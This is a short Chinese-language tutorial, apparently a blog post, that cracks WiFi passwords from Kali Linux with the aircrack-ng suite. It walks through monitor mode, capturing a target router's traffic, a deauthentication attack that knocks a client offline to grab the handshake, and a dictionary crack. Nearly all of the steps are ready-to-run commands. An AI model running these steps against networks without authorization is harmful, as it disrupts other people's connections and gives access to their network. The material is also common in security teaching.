聲明:本人堅決反對利用文章內容進行惡意攻擊行為,一切錯誤行為必將受到懲罰,綠色網絡需要靠我們共同維護,推薦大家在了解技術原理的前提下,更好的維護個人信息安全、企業安全、國家安全。
本次實驗是在vmware虛擬機中的kali系統下進行的,kali虛擬機中需要使用USB無線網卡RT3070,大家如果需要,可以點擊下方鏈接進行購買。
設置wlan為監聽模式
airmon-ng start wlan0 #開啟網卡wlan0監聽模式iwconfig #查看網卡狀態,發現wlan0mon,表示已開啟成功

探測附近WiFi
airdump-ng wlan0mon
- BSSID 代表路由器的MAC地址;
- PWR 代表信號的強度,數值越大代表信息越強;
- CH 代表信道;
- ENC代表用的加密的方式;
- AUTH 代表認證的方式;
- ESSID是WIFI的名字;

監聽路由
sudo airodump-ng -c 8 -w /home/wifi --bssid F0:16:28:21:FB:EA wlan0mon
- -c 信道數
- -w cap存儲路徑
- -bssid AP mac地址

對目標用戶發起攻擊使其掉線
對目標用戶發起攻擊使其掉線,wifi重連,獲取一次握手數據包
aireplay-ng -0 5 -a F0:16:28:21:FB:EA -c 04:8C:9A:56:EB:BC wlan0mon
- -0 5 攻擊模式 攻擊次數
- -a AP mac地址
- -c 用戶的 mac地址

數據包重放破解wifi密碼
aircrack-ng -w /home/pass.txt -b F0:16:28:21:FB:EA /home/wifi-01.cap
- -w 密碼字典路徑
- -b AP mac地址
- 上一步流量包路徑

虹科網絡安全
安全牛
系統安全運維
系統安全運維
LemonSec
系統安全運維
安全牛
系統安全運維
LemonSec
安全牛
安全牛
RacentYY